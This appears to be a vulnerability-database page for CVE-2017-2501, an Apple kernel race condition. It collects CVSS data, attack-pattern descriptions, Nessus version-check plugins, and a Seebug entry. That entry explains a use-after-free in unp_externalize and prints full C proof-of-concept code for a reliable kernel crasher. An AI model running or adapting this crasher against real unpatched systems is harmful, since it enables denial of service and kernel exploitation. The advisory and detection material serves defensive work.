Vulnerabilities > CVE-2017-2501 - Race Condition vulnerability in Apple products

047910
CVSS 7.6 - HIGH
Attack vector
NETWORK
Attack complexity
HIGH
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
high complexity
apple
CWE-362
nessus
exploit available

Summary

An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. tvOS before 10.2.1 is affected. watchOS before 3.2.2 is affected. The issue involves the "Kernel" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.

Vulnerable Configurations

Part Description Count
OS
Apple
326

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Leveraging Race Conditions
    This attack targets a race condition occurring when multiple processes access and manipulate the same resource concurrently and the outcome of the execution depends on the particular order in which the access takes place. The attacker can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance a race condition can occur while accessing a file, the attacker can trick the system by replacing the original file with his version and cause the system to read the malicious file.
  • Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions
    This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. The typical example is the file access. The attacker can leverage a file access race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker could do something such as replace the file and cause an escalation of privilege.

Exploit-Db

descriptionApple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization. CVE-2017-2501. Dos exploit for Multiple pla...
fileexploits/multiple/dos/42054.c
idEDB-ID:42054
last seen2017-05-25
modified2017-05-23
platformmultiple
port
published2017-05-23
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/42054/
titleApple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization
typedos

Nessus

  • NASL familyMisc.
    NASL idAPPLETV_10_2_1.NASL
    descriptionAccording to its banner, the version of Apple TV on the remote device is prior to 10.2.1. It is, therefore, affected by multiple vulnerabilities : - A memory corruption issue exists in the WebKit Web Inspector component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-2499) - An unspecified race condition exists in the Kernel component that allows a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2501) - An information disclosure vulnerability exists in the CoreAudio component due to improper sanitization of certain input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2502) - A universal cross-site scripting (XSS) vulnerability exists in WebKit due to a logic flaw when handling WebKit Editor commands. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id100256
    published2017-05-17
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100256
    titleApple TV < 10.2.1 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(100256);
      script_version("1.9");
      script_cvs_date("Date: 2019/11/13");
    
      script_cve_id(
        "CVE-2017-2499",
        "CVE-2017-2501",
        "CVE-2017-2502",
        "CVE-2017-2504",
        "CVE-2017-2505",
        "CVE-2017-2507",
        "CVE-2017-2513",
        "CVE-2017-2515",
        "CVE-2017-2518",
        "CVE-2017-2519",
        "CVE-2017-2520",
        "CVE-2017-2521",
        "CVE-2017-2524",
        "CVE-2017-2525",
        "CVE-2017-2530",
        "CVE-2017-2531",
        "CVE-2017-2536",
        "CVE-2017-2549",
        "CVE-2017-6979",
        "CVE-2017-6980",
        "CVE-2017-6984",
        "CVE-2017-6987",
        "CVE-2017-6989",
        "CVE-2017-7003",
        "CVE-2017-7005"
      );
      script_bugtraq_id(
        98454,
        98455,
        98456,
        98457,
        98468,
        98473
      );
    
      script_name(english:"Apple TV < 10.2.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the build number.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote Apple TV device is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its banner, the version of Apple TV on the remote device
    is prior to 10.2.1. It is, therefore, affected by multiple
    vulnerabilities :
    
      - A memory corruption issue exists in the WebKit Web
        Inspector component that allows an unauthenticated,
        remote attacker to execute arbitrary code.
        (CVE-2017-2499)
    
      - An unspecified race condition exists in the Kernel
        component that allows a local attacker to execute
        arbitrary code with kernel-level privileges.
        (CVE-2017-2501)
    
      - An information disclosure vulnerability exists in the
        CoreAudio component due to improper sanitization of
        certain input. A local attacker can exploit this to read
        the contents of restricted memory. (CVE-2017-2502)
    
      - A universal cross-site scripting (XSS) vulnerability
        exists in WebKit due to a logic flaw when handling
        WebKit Editor commands. An unauthenticated, remote
        attacker can exploit this, via a specially crafted web
        page, to execute arbitrary script code in a user's
        browser session. (CVE-2017-2504)
    
      - Multiple memory corruption issues exist in WebKit due to
        improper validation of certain input. An
        unauthenticated, remote attacker can exploit these to
        execute arbitrary code. (CVE-2017-2505, CVE-2017-2515,
        CVE-2017-2521, CVE-2017-2530, CVE-2017-2531,
        CVE-2017-6980, CVE-2017-6984)
    
      - Multiple information disclosure vulnerabilities exist
        in the Kernel component due to improper sanitization of
        certain input. A local attacker can exploit these to
        read the contents of restricted memory. (CVE-2017-2507,
        CVE-2017-6987)
    
      - A use-after-free error exists in the SQLite component
        when handling SQL queries. An unauthenticated, remote
        attacker can exploit this to deference already freed
        memory, resulting in the execution of arbitrary code.
        (CVE-2017-2513)
    
      - Multiple buffer overflow conditions exist in the SQLite
        component due to the improper validation of certain
        input. An unauthenticated, remote attacker can exploit
        these, via a specially crafted SQL query, to execute
        arbitrary code. (CVE-2017-2518, CVE-2017-2520)
    
      - A memory corruption issue exists in the SQLite component
        when handling SQL queries. An unauthenticated, remote
        attacker can exploit this, via a specially crafted
        query, to execute arbitrary code. (CVE-2017-2519)
    
      - An unspecified memory corruption issue exists in the
        TextInput component when parsing specially crafted data.
        An unauthenticated, remote attacker can exploit this to
        execute arbitrary code. (CVE-2017-2524)
    
      - A use-after-free error exists in WebKit when handling
        RenderLayer objects. An unauthenticated, remote attacker
        can exploit this, via a specially crafted web page, to
        deference already freed memory, resulting in the
        execution of arbitrary code. (CVE-2017-2525)
    
      - Multiple unspecified flaws exist in WebKit that allow
        an unauthenticated, remote attacker to corrupt memory
        and execute arbitrary code by using specially crafted
        web content. (CVE-2017-2536)
    
      - A universal cross-site scripting (XSS) vulnerability
        exists in WebKit due to a logic error when handling
        frame loading. An unauthenticated, remote attacker can
        exploit this, via a specially crafted web page, to
        execute arbitrary code in a user's browser session.
        (CVE-2017-2549)
    
      - An unspecified flaw exists in the IOSurface component
        that allows a local attacker to corrupt memory and
        execute arbitrary code with kernel-level privileges.
        (CVE-2017-6979)
    
      - An unspecified flaw exists in the AVEVideoEncoder
        component that allows a local attacker, via a specially
        crafted application, to corrupt memory and execute
        arbitrary code with kernel-level privileges.
        (CVE-2017-6989)
    
      - A denial of service vulnerability exists in the
        CoreText component due to improper validation of
        user-supplied input. An unauthenticated, remote attacker
        can exploit this, via a specially crafted file, to crash
        an application. (CVE-2017-7003)
    
      - A memory corruption issue exists in the JavaScriptCore
        component due to improper validation of user-supplied
        input. An unauthenticated, remote attacker can exploit
        this, via specially crafted web content, to cause a
        denial of service condition or the execution of
        arbitrary code. (CVE-2017-7005)
    
    Note that only 4th generation models are affected by these
    vulnerabilities.");
      script_set_attribute(attribute:"see_also", value:"https://support.apple.com/en-us/HT207801");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Apple TV version 10.2.1 or later. Note that this update is
    only available for 4th generation models.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-6989");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/15");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/05/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/17");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:apple:apple_tv");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Misc.");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("appletv_version.nasl");
      script_require_keys("AppleTV/Version", "AppleTV/Model", "AppleTV/URL", "AppleTV/Port");
      script_require_ports("Services/www", 7000);
    
      exit(0);
    }
    
    include("audit.inc");
    include("appletv_func.inc");
    
    url = get_kb_item('AppleTV/URL');
    if (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');
    port = get_kb_item('AppleTV/Port');
    if (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');
    
    build = get_kb_item('AppleTV/Version');
    if (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');
    
    model = get_kb_item('AppleTV/Model');
    if (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');
    
    fixed_build = "14W585a";
    tvos_ver = '10.2.1';
    
    # determine gen from the model
    gen = APPLETV_MODEL_GEN[model];
    
    appletv_check_version(
      build          : build,
      fix            : fixed_build,
      affected_gen   : 4,
      fix_tvos_ver   : tvos_ver,
      model          : model,
      gen            : gen,
      port           : port,
      url            : url,
      severity       : SECURITY_HOLE,
      xss            : TRUE
    );
    
  • NASL familyMacOS X Local Security Checks
    NASL idMACOS_10_12_5.NASL
    descriptionThe remote host is running a version of macOS that is 10.12.x prior to 10.12.5. It is, therefore, affected by multiple vulnerabilities : - Multiple memory corruption issues exist in the Kernel component that allow a local attacker to gain kernel-level privileges. (CVE-2017-2494, CVE-2017-2546) - A state management flaw exists in the iBooks component due to improper handling of URLs. An unauthenticated, remote attacker can exploit this, via a specially crafted book, to open arbitrary websites without user permission. (CVE-2017-2497) - A local privilege escalation vulnerability exists in the Kernel component due to a race condition. A local attacker can exploit this to execute arbitrary code with kernel-level privileges. (CVE-2017-2501) - An information disclosure vulnerability exists in the CoreAudio component due to improper sanitization of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2502) - A memory corruption issue exists in the Intel graphics driver component that allows a local attacker to execute arbitrary code with kernel-level privileges. CVE-2017-2503) - Multiple information disclosure vulnerabilities exist in the Kernel component due to improper sanitization of user-supplied input. A local attacker can exploit these to read the contents of restricted memory. (CVE-2017-2507, CVE-2017-2509, CVE-2017-2516, CVE-2017-6987) - A memory corruption issue exists in the Sandbox component that allows an unauthenticated, remote attacker to escape an application sandbox. (CVE-2017-2512) - A use-after-free error exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2513) - Multiple buffer overflow conditions exist in the SQLite component due to the improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted SQL query, to execute arbitrary code. (CVE-2017-2518, CVE-2017-2520) - A memory corruption issue exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this, via a specially crafted SQL query, to execute arbitrary code. (CVE-2017-2519) - An unspecified memory corruption issue exists in the TextInput component when parsing specially crafted data. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2524) - A flaw exists in the CoreAnimation component when handling specially crafted data. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2527) - A race condition exists in the DiskArbitration feature that allow a local attacker to gain system-level privileges. (CVE-2017-2533) - An unspecified flaw exists in the Speech Framework that allows a local attacker to escape an application sandbox. (CVE-2017-2534) - A resource exhaustion issue exists in the Security component due to improper validation of user-supplied input. A local attacker can exploit this to exhaust resources and escape an application sandbox. (CVE-2017-2535) - Multiple memory corruption issues exist in the WindowServer component that allow a local attacker to execute arbitrary code with system-level privileges. (CVE-2017-2537, CVE-2017-2548) - An information disclosure vulnerability exists in WindowServer component in the _XGetConnectionPSN() function due to improper validation of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2540) - A stack-based buffer overflow condition exists in the WindowServer component in the _XGetWindowMovementGroup() function due to improper validation of user-supplied input. A local attacker can exploit this to execute arbitrary code with the privileges of WindowServer. (CVE-2017-2541) - Multiple memory corruption issues exist in the Multi-Touch component that allow a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2542, CVE-2017-2543) - A use-after-free error exists in the IOGraphic component that allows a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2545) - A flaw exists in the Speech Framework, specifically within the speechsynthesisd service, due to improper validation of unsigned dynamic libraries (.dylib) before being loaded. A local attacker can exploit this to bypass the application
    last seen2020-06-01
    modified2020-06-02
    plugin id100270
    published2017-05-18
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100270
    titlemacOS 10.12.x < 10.12.5 Multiple Vulnerabilities

Seebug

bulletinFamilyexploit
descriptioniOS/MacOS kernel uaf due to bad locking in unix domain socket file descriptor externalization unp_externalize is responsible for externalizing the file descriptors carried within a unix domain socket message. That means allocating new fd table entries in the receiver and recreating a file which looks looks (to userspace) like the file the sender sent. Here's the relevant code: ``` for (i = 0; i < newfds; i++) { <----------- (a) #if CONFIG_MACF_SOCKET /* * If receive access is denied, don't pass along * and error message, just discard the descriptor. */ if (mac_file_check_receive(kauth_cred_get(), rp[i])) { proc_fdunlock(p); unp_discard(rp[i], p); fds[i] = 0; proc_fdlock(p); continue; } #endif if (fdalloc(p, 0, &f)) panic("unp_externalize:fdalloc"); fp = fileproc_alloc_init(NULL); if (fp == NULL) panic("unp_externalize: MALLOC_ZONE"); fp->f_iocount = 0; fp->f_fglob = rp[i]; if (fg_removeuipc_mark(rp[i])) fgl[i] = rp[i]; else fgl[i] = NULL; procfdtbl_releasefd(p, f, fp); fds[i] = f; } proc_fdunlock(p); <-------- (b) for (i = 0; i < newfds; i++) { if (fgl[i] != NULL) { VERIFY(fgl[i]->fg_lflags & FG_RMMSGQ); fg_removeuipc(fgl[i]); <--------- (c) } if (fds[i]) (void) OSAddAtomic(-1, &unp_rights); } ``` The loop at a gets the fileglobs from the socket message buffer and allocates new fds in the receiver and sets the fp->f_fglob fileglob pointer to point to the sent fg. After each new fd is allocated and initialized the fd is released and associated with the new fp. At (b) the code then drops the process fd lock at which point other threads can access the fd table again. At (c) the code then removes each of the fileglobs from the list of in-transit fileglobs; however this list *doesn't* hold an fg reference therefore there's nothing stopping the fg from getting free'd via another thread closing the fd between (b) and (c). Use zone poisoning for a reliable crasher. tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 ``` #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/uio.h> #include <sys/socket.h> #include <errno.h> #include <assert.h> #include <pthread.h> static const char kDummyData = 'D'; static int ReadDescriptor(int fd, int *fdRead) // Read a descriptor from fd and place it in *fdRead. // // On success, the caller is responsible for closing *fdRead. { int err; int junk; struct msghdr msg; struct iovec iov; struct { struct cmsghdr hdr; int fd; } control; char dummyData; ssize_t bytesReceived; // Pre-conditions assert(fd >= 0); assert( fdRead != NULL); assert(*fdRead == -1); // Read a single byte of data from the socket, with the assumption // that this byte has piggybacked on to it a single descriptor that // we're trying to receive. This is pretty much standard boilerplate // code for reading descriptors; see <x-man-page://2/recv> for details. iov.iov_base = (char *) &dummyData; iov.iov_len = sizeof(dummyData); msg.msg_name = NULL; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = &control; msg.msg_controllen = sizeof(control); msg.msg_flags = MSG_WAITALL; do { bytesReceived = recvmsg(fd, &msg, 0); if (bytesReceived == sizeof(dummyData)) { if ( (dummyData != kDummyData) || (msg.msg_flags != 0) || (msg.msg_control == NULL) || (msg.msg_controllen != sizeof(control)) || (control.hdr.cmsg_len != sizeof(control)) || (control.hdr.cmsg_level != SOL_SOCKET) || (control.hdr.cmsg_type != SCM_RIGHTS) || (control.fd < 0) ) { err = EINVAL; } else { *fdRead = control.fd; err = 0; } } else if (bytesReceived == 0) { err = EPIPE; } else { assert(bytesReceived == -1); err = errno; assert(err != 0); } } while (err == EINTR); assert( (err == 0) == (*fdRead >= 0) ); return err; } static int WriteDescriptor(int fd, int fdToWrite) // Write the descriptor fdToWrite to fd. { int err; struct msghdr msg; struct iovec iov; struct { struct cmsghdr hdr; int fd; } control; ssize_t bytesSent; char ack; // Pre-conditions assert(fd >= 0); assert(fdToWrite >= 0); control.hdr.cmsg_len = sizeof(control); control.hdr.cmsg_level = SOL_SOCKET; control.hdr.cmsg_type = SCM_RIGHTS; control.fd = fdToWrite; iov.iov_base = (char *) &kDummyData; iov.iov_len = sizeof(kDummyData); msg.msg_name = NULL; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = &control; msg.msg_controllen = control.hdr.cmsg_len; msg.msg_flags = 0; do { bytesSent = sendmsg(fd, &msg, 0); if (bytesSent == sizeof(kDummyData)) { err = 0; } else { assert(bytesSent == -1); err = errno; assert(err != 0); } } while (err == EINTR); return err; } char* filenames[10] = {"a", "b", "c", "d", "e", "f", "g", "h", "i", "j"}; void parent(int sock) { int f = 0; while(1) { char* filename = filenames[f]; f++; f %= 10; int to_send = open(filename, O_CREAT|O_RDWR, 0644); int err = WriteDescriptor(sock, to_send); printf("err: %x\n", err); close(to_send); } } void* child_thread(void* arg) { while(1) { close(3); } } void child(int sock) { for (int i = 0; i < 10; i++) { pthread_t t; pthread_create(&t, NULL, child_thread, NULL); } while (1) { int received = -1; int err = ReadDescriptor(sock, &received); close(received); } } int main() { int socks[2]; socketpair(PF_LOCAL, SOCK_STREAM, 0, socks); pid_t pid = fork(); if (pid != 0) { close(socks[1]); parent(socks[0]); int wl; waitpid(pid, &wl, 0); exit(EXIT_SUCCESS); } else { close(socks[0]); child(socks[1]); exit(EXIT_SUCCESS); } return 0; } ```
idSSV:93156
last seen2017-11-19
modified2017-05-27
published2017-05-27
reporterRoot
titleApple iOS / MacOS Domain Socket Kernel Use-After-Free(CVE-2017-2501)